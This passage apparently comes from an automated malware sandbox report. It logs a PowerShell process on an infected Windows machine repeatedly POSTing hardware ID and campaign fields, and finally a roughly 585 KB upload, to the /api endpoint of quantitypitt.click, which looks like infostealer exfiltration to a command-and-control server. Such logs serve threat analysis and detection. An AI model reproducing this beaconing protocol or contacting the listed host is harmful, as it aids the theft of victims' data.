                                                                                                  2025-01-06 12:56:33 UTC2776OUTData Raw: b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b 56 2d 7b 91
                                                                                                  Data Ascii: f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5V-{
                                                                                                  2025-01-06 12:56:33 UTC1137INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 06 Jan 2025 12:56:33 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=t6pi2u5022ruqp42e27qv1206j; expires=Fri, 02 May 2025 06:43:12 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RbrQQ76jumkklwuUGEWRn%2FjCJ1SiJ7Ffc3PhRLNQVslpMPqhieaF0DnLPDqwfcr%2BSRq3G2nnLlJB%2Bg2IEgwg1O%2Fxc7oYCMGpRkmSKSXL%2FnjQRAZpgfTrjfD9Seg9%2FfQ0gmBT7OI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fdbde66be02c475-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1655&min_rtt=1640&rtt_var=646&sent=11&recv=23&lost=0&retrans=0&sent_bytes=2847&recv_bytes=19062&delivery_rate=1652518&cwnd=181&unsent_bytes=0&cid=33f246a692bab22d&ts=689&x=0"
                                                                                                  2025-01-06 12:56:33 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                  2025-01-06 12:56:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  4192.168.2.449977104.21.43.2294431712C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-06 12:56:34 UTC278OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: multipart/form-data; boundary=G657I2PEWUM93
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 8752
                                                                                                  Host: quantitypitt.click
                                                                                                  2025-01-06 12:56:34 UTC8752OUTData Raw: 2d 2d 47 36 35 37 49 32 50 45 57 55 4d 39 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 38 43 34 42 41 31 35 37 30 39 42 31 33 31 39 38 35 45 37 34 42 43 34 45 39 34 36 39 31 42 35 0d 0a 2d 2d 47 36 35 37 49 32 50 45 57 55 4d 39 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 36 35 37 49 32 50 45 57 55 4d 39 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 61 4e 4c 6a 2d 2d 72 65 34 0d 0a 2d 2d 47 36 35 37 49 32 50 45 57 55 4d 39 33
                                                                                                  Data Ascii: --G657I2PEWUM93Content-Disposition: form-data; name="hwid"08C4BA15709B131985E74BC4E94691B5--G657I2PEWUM93Content-Disposition: form-data; name="pid"2--G657I2PEWUM93Content-Disposition: form-data; name="lid"yJaNLj--re4--G657I2PEWUM93
                                                                                                  2025-01-06 12:56:34 UTC1131INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 06 Jan 2025 12:56:34 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=0shdupfb6jnelk5edqqfrhg50s; expires=Fri, 02 May 2025 06:43:13 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OhBnBkJfTWx%2BDMrfwWFPBXORkFf2ikMQjOhYqsnS6HkLNF2NJziHECevUSs7MZb1OVdw3HuV3aSlp9T2TXQ%2B%2FiyAb0BJMa7bIKH5bCjkl7VLcYvZGhFWSNkVpi7BMtxQO%2B4W4bI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fdbde6e2e519e08-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1986&min_rtt=1981&rtt_var=753&sent=7&recv=13&lost=0&retrans=0&sent_bytes=2845&recv_bytes=9688&delivery_rate=1444829&cwnd=163&unsent_bytes=0&cid=9cbfbaecfc4447b7&ts=472&x=0"
                                                                                                  2025-01-06 12:56:34 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                  2025-01-06 12:56:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  5192.168.2.449983104.21.43.2294431712C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-06 12:56:35 UTC276OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: multipart/form-data; boundary=EU790BN3I2
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 20387
                                                                                                  Host: quantitypitt.click
                                                                                                  2025-01-06 12:56:35 UTC15331OUTData Raw: 2d 2d 45 55 37 39 30 42 4e 33 49 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 38 43 34 42 41 31 35 37 30 39 42 31 33 31 39 38 35 45 37 34 42 43 34 45 39 34 36 39 31 42 35 0d 0a 2d 2d 45 55 37 39 30 42 4e 33 49 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 45 55 37 39 30 42 4e 33 49 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 61 4e 4c 6a 2d 2d 72 65 34 0d 0a 2d 2d 45 55 37 39 30 42 4e 33 49 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                  Data Ascii: --EU790BN3I2Content-Disposition: form-data; name="hwid"08C4BA15709B131985E74BC4E94691B5--EU790BN3I2Content-Disposition: form-data; name="pid"3--EU790BN3I2Content-Disposition: form-data; name="lid"yJaNLj--re4--EU790BN3I2Content-Di
                                                                                                  2025-01-06 12:56:35 UTC5056OUTData Raw: 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78 29
                                                                                                  Data Ascii: lrQMn 64F6(X&7~`aO@dR<x)
                                                                                                  2025-01-06 12:56:35 UTC1139INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 06 Jan 2025 12:56:35 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=bbrd32g1srhl561gufobepdr99; expires=Fri, 02 May 2025 06:43:14 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W%2FtY%2ByFNiI%2FYC2RxVjNb4cq5Xrb4nGxNBO5QqT77%2B%2F%2BnMTHWKUwwNUP%2BnccycbdecPwp9NZL5fgcoNq9PNQ6q4Ezk5UL1GF8mKFhkxjxApVM5iEn1xzJvX50HkSYZMHpKVJFLRg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fdbde745ceff78d-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1672&min_rtt=1670&rtt_var=631&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21343&delivery_rate=1726788&cwnd=125&unsent_bytes=0&cid=60bee3fbf38d38f6&ts=657&x=0"
                                                                                                  2025-01-06 12:56:35 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                  2025-01-06 12:56:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  6192.168.2.449998104.21.43.2294431712C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-06 12:56:37 UTC283OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: multipart/form-data; boundary=OSRY9JPW5ZXN86XXQX
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 7128
                                                                                                  Host: quantitypitt.click
                                                                                                  2025-01-06 12:56:37 UTC7128OUTData Raw: 2d 2d 4f 53 52 59 39 4a 50 57 35 5a 58 4e 38 36 58 58 51 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 38 43 34 42 41 31 35 37 30 39 42 31 33 31 39 38 35 45 37 34 42 43 34 45 39 34 36 39 31 42 35 0d 0a 2d 2d 4f 53 52 59 39 4a 50 57 35 5a 58 4e 38 36 58 58 51 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 53 52 59 39 4a 50 57 35 5a 58 4e 38 36 58 58 51 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 61 4e 4c 6a 2d 2d 72 65 34 0d 0a
                                                                                                  Data Ascii: --OSRY9JPW5ZXN86XXQXContent-Disposition: form-data; name="hwid"08C4BA15709B131985E74BC4E94691B5--OSRY9JPW5ZXN86XXQXContent-Disposition: form-data; name="pid"1--OSRY9JPW5ZXN86XXQXContent-Disposition: form-data; name="lid"yJaNLj--re4
                                                                                                  2025-01-06 12:56:40 UTC1128INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 06 Jan 2025 12:56:40 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=qtbi5e9b9hliu69bsfdo37p3cu; expires=Fri, 02 May 2025 06:43:16 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uu7iBzMySN%2BQWBpA%2BcaFElbA5MfP5BuBVky8gjWdSz56J2sSiwhIvyf4KtA4MYthu8IPG4FhbmQByg8Pp0iGkNAgjtPTBGbUjO4vr1ALv82u9Nz8KUKTthCJa23DcvM8htyl05I%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fdbde816a1b4234-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1643&min_rtt=1618&rtt_var=656&sent=6&recv=12&lost=0&retrans=0&sent_bytes=2845&recv_bytes=8047&delivery_rate=1606160&cwnd=172&unsent_bytes=0&cid=c5e8507ac4b70de6&ts=2895&x=0"
                                                                                                  2025-01-06 12:56:40 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                  2025-01-06 12:56:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  7192.168.2.450014104.21.43.2294431712C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-06 12:56:40 UTC273OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: multipart/form-data; boundary=ZQKFUWF4D
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 906
                                                                                                  Host: quantitypitt.click
                                                                                                  2025-01-06 12:56:40 UTC906OUTData Raw: 2d 2d 5a 51 4b 46 55 57 46 34 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 38 43 34 42 41 31 35 37 30 39 42 31 33 31 39 38 35 45 37 34 42 43 34 45 39 34 36 39 31 42 35 0d 0a 2d 2d 5a 51 4b 46 55 57 46 34 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 51 4b 46 55 57 46 34 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 61 4e 4c 6a 2d 2d 72 65 34 0d 0a 2d 2d 5a 51 4b 46 55 57 46 34 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73
                                                                                                  Data Ascii: --ZQKFUWF4DContent-Disposition: form-data; name="hwid"08C4BA15709B131985E74BC4E94691B5--ZQKFUWF4DContent-Disposition: form-data; name="pid"1--ZQKFUWF4DContent-Disposition: form-data; name="lid"yJaNLj--re4--ZQKFUWF4DContent-Dispos
                                                                                                  2025-01-06 12:56:41 UTC1134INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 06 Jan 2025 12:56:40 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=o537u64fkkgkf7jpo586jbp0vr; expires=Fri, 02 May 2025 06:43:19 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dSbAziqNNSP0834aiIyf50kaCErG59b7mwPd6hHt%2FHIALfaMFAKM%2BqrGF3N7VGCjuLXvNCcnksFSZl%2B%2BC5ntID8QKO1JI6qzEa1HcB3V0m%2Fmzc2RopJ8IvBTup7xi%2Ft27eWkGWM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fdbde96aae443ab-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1595&min_rtt=1592&rtt_var=603&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1815&delivery_rate=1803582&cwnd=221&unsent_bytes=0&cid=907112727950a90f&ts=385&x=0"
                                                                                                  2025-01-06 12:56:41 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                  2025-01-06 12:56:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  8192.168.2.450015104.21.43.2294431712C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-06 12:56:41 UTC277OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: multipart/form-data; boundary=JE1C5LXKHU
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 585170
                                                                                                  Host: quantitypitt.click
                                                                                                  2025-01-06 12:56:41 UTC15331OUTData Raw: 2d 2d 4a 45 31 43 35 4c 58 4b 48 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 38 43 34 42 41 31 35 37 30 39 42 31 33 31 39 38 35 45 37 34 42 43 34 45 39 34 36 39 31 42 35 0d 0a 2d 2d 4a 45 31 43 35 4c 58 4b 48 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4a 45 31 43 35 4c 58 4b 48 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 61 4e 4c 6a 2d 2d 72 65 34 0d 0a 2d 2d 4a 45 31 43 35 4c 58 4b 48 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                  Data Ascii: --JE1C5LXKHUContent-Disposition: form-data; name="hwid"08C4BA15709B131985E74BC4E94691B5--JE1C5LXKHUContent-Disposition: form-data; name="pid"1--JE1C5LXKHUContent-Disposition: form-data; name="lid"yJaNLj--re4--JE1C5LXKHUContent-Di
                                                                                                  2025-01-06 12:56:41 UTC15331OUTData Raw: 3f 31 76 28 bf f9 1f 5f b5 28 c6 85 0d e9 17 93 8e 5f 5b 35 eb dd d5 39 6c 8b 8c 8a aa e4 6d 93 59 6e 4e 13 dd 7a 45 4d 2a 71 d0 de 27 74 31 4b 15 1b 51 11 7f 9c 09 bc 0f 42 65 97 6a 66 4a af f1 e3 06 06 b7 f2 0a 89 8f 61 2f 75 c2 40 89 52 25 82 fe 3c bd d1 50 1b 33 74 e4 ec a4 76 f8 5f 1f f7 89 da 60 6e b7 f4 13 9c f9 9f 17 1e 9c 5a 33 9f 91 e9 aa 7a 90 ad 8e 66 4f ab 9b b2 df bf 4f 85 e8 3b 4c 85 6c e8 ab e6 1d 6c aa 9e a8 06 25 49 7b 42 0a ef ce b4 74 71 9e c9 af c0 0d f2 f7 40 5b 50 75 74 6f c2 69 ce 8e d9 42 93 30 f7 43 29 7b 71 d3 8c 21 17 37 1f e5 ae 55 de 10 de 86 f3 f9 eb eb 35 07 a9 e7 d9 e9 f3 3e 31 c2 00 e8 45 50 ad 51 29 34 cb 22 31 fa 4f f1 ee d5 93 7e cb 5f c2 73 40 8f b0 ef 6d dd 27 a0 a7 1a b0 83 77 af 27 1f fc e4 ba 9a 52 16 d8 e9 a6 c2
                                                                                                  Data Ascii: ?1v(_(_[59lmYnNzEM*q't1KQBejfJa/u@R%<P3tv_`nZ3zfOO;Lll%I{Btq@[PutoiB0C){q!7U5>1EPQ)4"1O~_s@m'w'R
                                                                                                  2025-01-06 12:56:41 UTC15331OUTData Raw: f0 93 07 aa 98 c6 ad 58 22 61 23 15 84 db 40 fe ff f6 1e 92 f0 63 18 bb a0 5e d3 92 dc 1b af 28 36 0a ec 49 4d 2f 1b a1 e0 f9 d1 38 0e 50 fc 54 0c f6 e7 cd 94 76 df 78 72 98 a0 12 90 de c5 94 9b cd d6 b1 74 ae b3 36 42 89 7a 59 3c 8f e6 60 10 ec a6 ac 0d e5 bd 50 88 a6 0f 6d 81 45 8f 43 66 17 1b 24 05 75 dd ce bf 57 ba e0 b7 2f 52 48 ed 75 2a 8d f0 9d 96 99 01 27 f0 f9 42 d0 c9 8b aa bf ef b0 95 04 91 4c c2 20 ba c9 ee 72 1e e7 8a 18 36 b3 15 e6 17 7b bd 9e 04 f0 4d 5a df d9 ec fe 2a a0 5c 53 89 d5 5c f3 ea 7a 1a 6a e7 b2 31 f0 18 56 e6 74 9b 41 b7 4e 23 e6 f7 f2 38 8d b6 42 d4 7d 98 93 92 e7 49 1d 8c 48 2f de 18 c2 f3 88 6f 3c a2 ae 10 ef 43 87 4a 71 f6 79 06 70 fc de fc 43 a0 fc 5f 64 60 6c ce 17 47 ed 7d d1 f5 c3 db a5 37 a5 a3 c2 7d a7 ae 01 33 11 99
                                                                                                  Data Ascii: X"a#@c^(6IM/8PTvxrt6BzY<`PmECf$uW/RHu*'BL r6{MZ*\S\zj1VtAN#8B}IH/o<CJqypC_d`lG}7}3
                                                                                                  2025-01-06 12:56:41 UTC15331OUTData Raw: 86 af bb 4b 27 0e 18 46 85 ef 05 c7 0d 10 67 8c 8b f8 a2 83 ee 61 18 ab 23 cd f7 37 4c 12 8d c1 4a ca 45 d6 1f 3d 83 fe 63 a9 43 33 cf c3 57 a0 1c 64 f0 45 07 62 57 e2 76 f5 91 bb af 9a 6f 59 1b 3f 62 d8 74 04 79 00 41 c8 b9 e7 9c 5d 81 e2 ef ce aa a5 c1 5a 95 02 ce e9 01 21 b2 2f e7 28 7b 0c 05 c2 b3 5b 6a 25 32 2e ff 17 bf 3f ee dc f0 91 be f0 e5 93 f7 05 8b ce 81 2d 36 f3 82 e7 6b ee 0e 04 50 02 bc b6 2a f7 60 ab bb 2f d8 9f 8f aa 16 d5 2e 15 00 87 12 88 6c c8 75 5e da c4 6d a1 54 7e 9b 48 a9 2c c8 63 11 fd ea ee 44 c5 0b a7 54 f8 de de 04 9e f3 65 26 44 53 40 da 32 8c ec e7 86 37 53 e8 1b 91 77 38 27 21 de 04 78 e4 52 06 40 7e 27 88 df cd 7c b9 3c 7a 9e 20 fa 9c 61 a0 a7 2e 79 1f 52 5b 47 00 cd 00 0f 28 c4 c5 b2 da 06 58 4d 5e f0 29 88 90 fb b4 a8 84
                                                                                                  Data Ascii: K'Fga#7LJE=cC3WdEbWvoY?btyA]Z!/({[j%2.?-6kP*`/.lu^mT~H,cDTe&DS@27Sw8'!xR@~'|<z a.yR[G(XM^)
